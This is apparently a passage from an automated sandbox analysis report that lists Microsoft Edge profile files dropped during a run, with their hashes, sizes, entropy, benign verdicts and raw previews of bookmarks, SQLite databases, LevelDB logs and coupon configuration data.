              Preview:{.. "checksum": "45c5e75d52aad358849be76b67352156",.. "roots": {.. "bookmark_bar": {.. "children": [ {.. "date_added": "13351791129026434",.. "date_last_used": "0",.. "guid": "8207d328-b309-4144-8a36-f1c294fe64d3",.. "id": "7",.. "name": "Amazon",.. "show_icon": false,.. "source": "import_fre",.. "type": "url",.. "url": "http://www.amazon.com/".. }, {.. "date_added": "13351791129026434",.. "date_last_used": "0",.. "guid": "4d7e43f2-ec87-49de-8592-618e99fb24e0",.. "id": "8",.. "name": "Facebook",.. "show_icon": false,.. "source": "import_fre",.. "type": "url",.. "url": "http://www.facebook.com/".. }, {.. "date_added": "13351791129026434",.. "date_last_used": "0",.. "guid": "7510118f-0386-4819-b07e-d4da7bf2d503",.. "i
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 34, database pages 18, cookie 0x19, schema 4, UTF-8, version-valid-for 34
              Category:dropped
              Size (bytes):73728
              Entropy (8bit):0.4947385728088827
              Encrypted:false
              SSDEEP:
              MD5:29C9AF42D59BA452C914D337F83778D8
              SHA1:0D4075E73B0189BD28D6968499DCFDE5975116CB
              SHA-256:DFDAE22D17235546DAF4200A5920C46B10E0885D9A0BE747D3DE14F432817613
              SHA-512:DB03C53D1CC2AE5E1E7882437730454AC27842FE5211A6DBDBBB5131EB0D607DB5D2F26EADB08CD9BAD90FD93D6E04A2C27361FE5BD1B510467D2E9BAEF90FBE
              Malicious:false
              Reputation:unknown
              Preview:SQLite format 3......@ ..."..................................................................."..j....................0...{...h.6.~.%...U........................................................................................................................................................................................................................................................................................................................................................................G...##..Utablecollectionscollections.CREATE TABLE collections ( id LONGVARCHAR PRIMARY KEY, date_created REAL NOT NULL, date_modified REAL NOT NULL, title LONGVARCHAR NOT NULL, position INTEGER NOT NULL, is_syncable INTEGER DEFAULT 1, suggestion_url LONGVARCHAR, suggestion_dismissed INTEGER, suggestion_type INTEGER, thumbnail BLOB, is_custom_thumbnail INTEGER NOT NULL DEFAULT 0, tag LONGVARCHAR, thumbnail_url LONGVARCHAR, is_marked_for_deletion INTEGER)..........tableitemsitems.CREATE TABLE items
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
              Category:dropped
              Size (bytes):28672
              Entropy (8bit):0.4585801060576883
              Encrypted:false
              SSDEEP:
              MD5:EFC4EA8FFD1EC2BE736944CA2EDCAEEF
              SHA1:B9F16107D219A83159D93CF79520FB28D4092900
              SHA-256:66013AB74D53BF2F4EDF5C0390604182B20D072EA33219850514B049680A04E9
              SHA-512:A4F87708DE933F387A52BEB27F3AE7E0C938E5E320506801D4B955578DD3B823E8480F5C28F9AA7DF46311498FA5284685327C465DE7740C2230D51BD94A2778
              Malicious:false
              Reputation:unknown
              Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
              Category:dropped
              Size (bytes):10240
              Entropy (8bit):0.8708334089814068
              Encrypted:false
              SSDEEP:
              MD5:92F9F7F28AB4823C874D79EDF2F582DE
              SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
              SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
              SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
              Malicious:false
              Reputation:unknown
              Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
              Category:dropped
              Size (bytes):8192
              Entropy (8bit):0.01057775872642915
              Encrypted:false
              SSDEEP:
              MD5:CF89D16BB9107C631DAABF0C0EE58EFB
              SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
              SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
              SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
              Malicious:false
              Reputation:unknown
              Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):8192
              Entropy (8bit):0.012340643231932763
              Encrypted:false
              SSDEEP:
              MD5:41876349CB12D6DB992F1309F22DF3F0
              SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
              SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
              SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
              Malicious:false
              Reputation:unknown
              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
              Category:dropped
              Size (bytes):262512
              Entropy (8bit):9.553120663130604E-4
              Encrypted:false
              SSDEEP:
              MD5:4B04A26076D73BCB5BF1FF3CFCF88BD4
              SHA1:72B31CA68786D82276AB824248F78C19714A3337
              SHA-256:22014C90C00CCAF03395E039CDCBAC052850E0B733C064D269DF02E8030250B6
              SHA-512:16FBFBED09D4F5745F629098BF53F50AFB31149F25BA26B3818E0D831B65CCD99F64FA4036213B2963A12AB00080B7F81D5EFA8D57CCB932DD2A5815CEF3A801
              Malicious:false
              Reputation:unknown
              Preview:.........................................v.i.q/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):809297
              Entropy (8bit):6.009185777022009
              Encrypted:false
              SSDEEP:
              MD5:A5750AE9346633D0E0498FE97E7D3959
              SHA1:BABFFF8BFF85F2D6F834B226CD4E5376F22E046F
              SHA-256:CAAC7FF3F50C880F7C7D4B521EC767371D419A1AD321FA2AD931B4C693574345
              SHA-512:2EB1B167BA1966DB447EA95B0AC86CFC7D198C32F0EC0321B8C55A0FFAA8F83D4829CB88B70A0D3BDE4274BD0ED61A6AD47022BE6566D316920E92B358040BE3
              Malicious:false
              Reputation:unknown
              Preview:...m.................DB_VERSION.1.S ..................BLOOM_FILTER:.1{"numberOfHashFunctions":8,"shiftBase":8,"bloomFilterArraySize":4804177,"primeBases":[5381,5381,5381,5381],"supportedDomains":"+WLHERFOFw1byRcokcblSoC2WQbpwbMlBICal0CAjPuIeRF3TjP7Nr+pvgT1DmRJgnJ4N/+wvczXVuSSWRZAA6LYIU+90IsMX9klRA5CmREPMZ7GoyQYZyFU6L9mDH6aMpYuOkMnCDJi6rxx5OK0+GGv97ENjWBGRMaqPGYzo70ei2kA/JsjdWdq8VCSUKV/TqJkbd//n5TtjcxAczEzG6n4J70LXNMSjFlXPaTI1BZG0fjkpP4P2YKMvulZCkRgmHexcFSHTp5uzvoSYkYCgW4q94wfUbE0/ZVW9IaSK2cjJlrY/0+IJ0RZZkzfSvOcGbtwjCm/3/fwOgFChznqGlh7mVaDVMbALRGSuXHLZP6eC7Ro1/dy/l+iPLze5Ben4hKgfCiqqrMnWmSPkEPGXJiAwXEg1H4NjZ6QzjP1qbcIm3mnfXu3eiV2wrDNdyNxL2pQpEsRenA74DmlQCispFAclIhWAn6mZSIHRgaej1dr0On4wwOlxvrucxhvfQfn2lLOOBuM696JwPMkxkAXwLYMSS9Pn0ISHKxwJnObMYkEH7H86rt9oKC68/Mfabc97RqJPhFYmUzK1tz6jXpRw4SxDoqKweekKCzBQ01XqYX5O6iZPOkNTsAC93bvGxFyDYhBo5Pke3UHND8v1jMutu0of8+9qvwQ9RafWgfSOu9g5X2QZrRBkJUZ+MBL+m0icoDr55HEvhuFG+jbVd/Tnct+r6Hj8cwFvDd1998isply6UxEMGsK9MCtOdPgAtojDDUEYckJDTtxWyWeJ1SpF4pEezVGg2OKk4v
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):142
              Entropy (8bit):5.0048503701587945
              Encrypted:false
              SSDEEP:
              MD5:9BCC8265C1930A134DBC6E48499EF627
              SHA1:07199FE7518EC99ACA4EA69A103C1626B7337B72
              SHA-256:CECA7E30E4FCC70ECF48F10CB9B2B22087AE615D822F9B7852778C754FB4631F
              SHA-512:3B2B9C98B6522845A52FD70FD6A3C56B58F827E96A1D25BEFA2988D15865E89969CDA589C6F7A277E1CA393CD41B411395B8D059C24B5FA9C7BAF10C48F5896C
              Malicious:false
              Reputation:unknown
              Preview:TY..9................BLOOM_FILTER_EXPIRY_TIME:.1709290666.654680..v.G................BLOOM_FILTER_LAST_MODIFIED:.Thu, 29 Feb 2024 08:23:08 GMT
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):809237
              Entropy (8bit):6.008156200599342
              Encrypted:false
              SSDEEP:
              MD5:6E7B3E1CC83B865F037BD54225428690
              SHA1:31AA86AB9263356A679B2A42895C426EE77A2D2B
              SHA-256:8C66AC085C07C55E59C15C69CF150BD2C0FA2D3B2A4BE680D611EDAB339423CD
              SHA-512:9C2B0C4FB6C970C0F65B2009E8C54BFE9AE130F7C6BBC78E8D4F9C8C6559932C9D77DE2B79415B262977AA3F69E24E062FB64323AE85575D1ECB5B7F9C759202
              Malicious:false
              Reputation:unknown
              Preview:...1BLOOM_FILTER:........{"numberOfHashFunctions":8,"shiftBase":8,"bloomFilterArraySize":4804177,"primeBases":[5381,5381,5381,5381],"supportedDomains":"+WLHERFOFw1byRcokcblSoC2WQbpwbMlBICal0CAjPuIeRF3TjP7Nr+pvgT1DmRJgnJ4N/+wvczXVuSSWRZAA6LYIU+90IsMX9klRA5CmREPMZ7GoyQYZyFU6L9mDH6aMpYuOkMnCDJi6rxx5OK0+GGv97ENjWBGRMaqPGYzo70ei2kA/JsjdWdq8VCSUKV/TqJkbd//n5TtjcxAczEzG6n4J70LXNMSjFlXPaTI1BZG0fjkpP4P2YKMvulZCkRgmHexcFSHTp5uzvoSYkYCgW4q94wfUbE0/ZVW9IaSK2cjJlrY/0+IJ0RZZkzfSvOcGbtwjCm/3/fwOgFChznqGlh7mVaDVMbALRGSuXHLZP6eC7Ro1/dy/l+iPLze5Ben4hKgfCiqqrMnWmSPkEPGXJiAwXEg1H4NjZ6QzjP1qbcIm3mnfXu3eiV2wrDNdyNxL2pQpEsRenA74DmlQCispFAclIhWAn6mZSIHRgaej1dr0On4wwOlxvrucxhvfQfn2lLOOBuM696JwPMkxkAXwLYMSS9Pn0ISHKxwJnObMYkEH7H86rt9oKC68/Mfabc97RqJPhFYmUzK1tz6jXpRw4SxDoqKweekKCzBQ01XqYX5O6iZPOkNTsAC93bvGxFyDYhBo5Pke3UHND8v1jMutu0of8+9qvwQ9RafWgfSOu9g5X2QZrRBkJUZ+MBL+m0icoDr55HEvhuFG+jbVd/Tnct+r6Hj8cwFvDd1998isply6UxEMGsK9MCtOdPgAtojDDUEYckJDTtxWyWeJ1SpF4pEezVGg2OKk4vtpaExDpM+E6XWYY2ufn2BPnj8Yqzl+qta6KOuganQ6GS
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):509
              Entropy (8bit):5.265567720443079
              Encrypted:false
              SSDEEP:
              MD5:B1977A7FF1772D3A242318E99FFF9EAB
              SHA1:564491416848E4AA943BF638CA2B6312D304CA02
              SHA-256:9D34DED99B5936B7D6373088EE4CC1AF6532DD09894BABF2DBEDEE037C155FD4
              SHA-512:C0AE0742045C37F675624E2200D2F015765EE807AED1475205AA66D5F2EB0C99D20FA7DD6B5D3925C6AAEE150C1488931A39FCE38837CB0DBEC51FA1BEC6C23F
              Malicious:false
              Reputation:unknown
              Preview:2024/02/29-11:57:29.065 1a84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/02/29-11:57:29.069 1a84 Recovering log #3.2024/02/29-11:57:29.072 1a84 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .2024/02/29-11:57:46.682 9d8 Level-0 table #5: started.2024/02/29-11:57:46.711 9d8 Level-0 table #5: 809237 bytes OK.2024/02/29-11:57:46.713 9d8 Delete type=0 #3.
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:OpenPGP Secret Key
              Category:dropped
              Size (bytes):103
              Entropy (8bit):5.248480538985684
              Encrypted:false
              SSDEEP:
              MD5:5C8E8CE6BA2DEAFFFAAF0F3A5849DEF2
              SHA1:B6F1DD0CCB001CA8BC1AF6A3D529EAEA036A36E4
              SHA-256:109C529E0A4BE29C54B6D3362AD0281D5F99982684AB4589754B0AF3CFC1502E
              SHA-512:52495009A48FD071A2D116B5B4570845F935D4ABCBB3203AD0B70586C901DD76F674B106468584D3874150B526A8CE7722B8DC7B9C712071D80CD49C2B7A04C3
              Malicious:false
              Reputation:unknown
              Preview:.|.."....leveldb.BytewiseComparator........Gp7...............1.BLOOM_FILTER:.........DB_VERSION........
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
              Category:dropped
              Size (bytes):20480
              Entropy (8bit):0.613065654555418
              Encrypted:false
              SSDEEP:
              MD5:8BB82309DD8979EFDA528ED5C694636B
              SHA1:0125E28DA282FEF8B8629F221801D6AC4F0A77B6
              SHA-256:A6B2FF42E5B1FB6748D70D75DA9E459B2F920EA5D01D0A943EF13470BEDD547E
              SHA-512:B6CE04F5D5AB83BD2A0AFBD5A6178DE644D38829640AF94744B13A6A598033977ABF6F15B9C25E6263337888FCCE4F050B8C085F46CF12FF3958694ECEE60E8F
              Malicious:false
              Reputation:unknown
              Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):392649
              Entropy (8bit):5.409232986646639
              Encrypted:false
              SSDEEP:
              MD5:7538DE282E3E921CB8B8C77A95D5A88C
              SHA1:72663D33253929E49A8B8958C2F0BE7799599B48
              SHA-256:70BDFBCB5127317537F07944346640A5A4D2DF6EA35C6DF2BFBEFF9A4CF98D13
              SHA-512:F9C1B9DCD3510DA84A0C6CAAB421C322AE75E8D977EEAE97A9B162B3A2AD617E974093455F47E48FAAEACC31B191FE8032507A300C733DD9590BA4CA316A0196
              Malicious:false
              Reputation:unknown
              Preview:...m.................DB_VERSION.15.&2................&QUERY_TIMESTAMP:domains_config_gz2.*.*.13353677853494694..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.75/asset?sv=2017-07-29&sr=c&sig=%2Fwp1fD0xo8ywYyo5yFzHEjCMobUSk%2BZ4nmFYB%2FqjsBg%3D&st=2021-01-01T00%3A00%3A00Z&se=2024-05-01T00%3A00%3A00Z&sp=r&assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":75},"hash":"EwG2gkfquexLj6u3yjHyiL4YQwdU318k1Hub+1rSDMI=","size":391864}]....}...............ASSET_VERSION:domains_config_gz.2.8.75..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko":
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):311
              Entropy (8bit):5.158220687561962
              Encrypted:false
              SSDEEP:
              MD5:0635CA329EE62413D16FAD11A556DE04
              SHA1:E160B1A690FF03F2F8DA738904A6CF1A4DE86CD1
              SHA-256:B476413D32BCE49167E90871C228AF858486E3F96964EB4D2C2C6AF853E2ED59
              SHA-512:94B9A084D6AD08837E0C48813A63BED7CF495E85B306D7BAEFD4248A25AB197066C167264A165DC118BD1A442ADBED04688326DD9828291C1B11439765596AE1
              Malicious:false
              Reputation:unknown
              Preview:2024/02/29-11:57:32.941 1eb8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/02/29-11:57:33.011 1eb8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:modified
              Size (bytes):374811
              Entropy (8bit):5.396168819018621
              Encrypted:false
              SSDEEP:
              MD5:DBB5AFDE321E77E3F9430FCAD5928E47
              SHA1:3C904165ED5A023CF17C6FE13FC4546078868BD8
              SHA-256:E4E4061B1055BC270875D5EDDBE538229F0AF57532D5881E95878C50FF33DCC8
              SHA-512:95A92AD810925D063644DC50EC44535635F84776CD53CE1A5092380BD040862F42B5AA2440AC46CD2F2E3F75A99232638812EDF0D58712E5CBC11EE8A0996E4D
              Malicious:false
              Reputation:unknown
              Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):418
              Entropy (8bit):1.8784775129881184
              Encrypted:false
              SSDEEP:
              MD5:BF097D724FDF1FCA9CF3532E86B54696
              SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
              SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
              SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
              Malicious:false
              Reputation:unknown
              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):324
              Entropy (8bit):5.19020445216892
              Encrypted:false
              SSDEEP:
              MD5:F6A0CFB14EF7886ECD353B534A3808F7
              SHA1:659A65265B130B0F35362869DDC6D425EBFF1F24
              SHA-256:BCC6123E42911BFA11C6BF5B9AF9FC697ECFA7661D7087B649582D760195ACE5
              SHA-512:2981C45C6A0D1DCF16978ED82E26E9B83E7A52CE7B77F6A9275F22CE324BE53B2D30F9AFBDFEAD6C8CC4066898A37D0B3380832DC8EFC21382AD6B29C2B37E82
              Malicious:false
              Reputation:unknown
              Preview:2024/02/29-11:57:29.077 15bc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/02/29-11:57:29.079 15bc Recovering log #3.2024/02/29-11:57:29.080 15bc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):328
              Entropy (8bit):5.166762459061136
              Encrypted:false
              SSDEEP:
              MD5:D5324FB9411DEE5400CCA002E501CD33
              SHA1:9F23D4F9D002F9E2C9A9EC5EFF7419BE7FE07509
              SHA-256:006BA53472C740C3F4AF3EF5B072429C38D22164A192EF2EA52BA9520702EF05
              SHA-512:BA00B6B4F867EF2A53A73D34E366FA726891D7B0757958B3B03568DB3DD5DF82587919A2C7AE9135EEF7B5AD8584C78C3963675FE1D3CB47B40A4590E05033F1
              Malicious:false
              Reputation:unknown
              Preview:2024/02/29-11:57:29.113 1890 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/02/29-11:57:29.140 1890 Recovering log #3.2024/02/29-11:57:29.141 1890 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):1254
              Entropy (8bit):1.8784775129881184
              Encrypted:false
              SSDEEP:
              MD5:826B4C0003ABB7604485322423C5212A
              SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
              SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
              SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
              Malicious:false
              Reputation:unknown
              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):324
              Entropy (8bit):5.2133273891135365
              Encrypted:false
              SSDEEP:
              MD5:EFC14DE4E0E39A0ABDFE1D75CAB65467
              SHA1:3194FBE7CD206E99F2AEB0789A7B091BD47C2EAD
              SHA-256:B51B13AD8EC6C834E3A6E9F9C514222ED4DA994815EEFBF22DCEC4C3FCC95318
              SHA-512:19CAB38143EDBBD1B833CCB17AB1F8B250C0880106AD8C1B0E874147BE92A82A3D6B3019A749017E7E5725B16982058A90EA8429CCEE4A30CDC55E2985BB4BCE
              Malicious:false
              Reputation:unknown
              Preview:2024/02/29-11:57:29.641 1578 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/02/29-11:57:29.642 1578 Recovering log #3.2024/02/29-11:57:29.643 1578 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):429
              Entropy (8bit):5.809210454117189
              Encrypted:false
              SSDEEP:
              MD5:5D1D9020CCEFD76CA661902E0C229087
              SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
              SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
              SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
              Malicious:false
              Reputation:unknown
              Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 20, cookie 0x8, schema 4, UTF-8, version-valid-for 3
              Category:dropped
              Size (bytes):40960
              Entropy (8bit):5.0777372936326
              Encrypted:false
              SSDEEP:
              MD5:DA2B083DC7EC204FCA1CEB97A21C54F5
              SHA1:DF46E328C809B0B411EEBCA73605A9C7637544E2
              SHA-256:6073A51B4D1FCD69CC87953AD7A24268A8A716A3C589B92AD92AC0DDC0DF7374
              SHA-512:CD2D471A721CE680761199577FE8C76AF00382B5B7DE76A09DF4EACE7A0D42B895A609D5EFA8D29B5EAF9665ECEEA2D77B338BA1CE2E22268D0A325ABF9ACFFE
              Malicious:false
              Reputation:unknown
              Preview:SQLite format 3......@ ..........................................................................j..........g....._.c...~.2.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s...;+...indexfavicon_bitmaps_icon_idfavico
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):270336
              Entropy (8bit):8.280239615765425E-4
              Encrypted:false
              SSDEEP:
              MD5:D0D388F3865D0523E451D6BA0BE34CC4
              SHA1:8571C6A52AACC2747C048E3419E5657B74612995
              SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
              SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
              Malicious:false
              Reputation:unknown
              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):8192
              Entropy (8bit):0.011852361981932763
              Encrypted:false
              SSDEEP:
              MD5:0962291D6D367570BEE5454721C17E11
              SHA1:59D10A893EF321A706A9255176761366115BEDCB
              SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
              SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
              Malicious:false
              Reputation:unknown
              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
              Category:dropped
              Size (bytes):262512
              Entropy (8bit):9.553120663130604E-4
              Encrypted:false
              SSDEEP:
              MD5:E4BD7B28E729B2DDE0F33AA520759541
              SHA1:DC8973F8B6C1B33143260653C57DF183A1DAF596
              SHA-256:85FDFA28A2941BD2960A0096ACFC2B5B45D43E734E70EFB9DA9980F9CAA21DAC
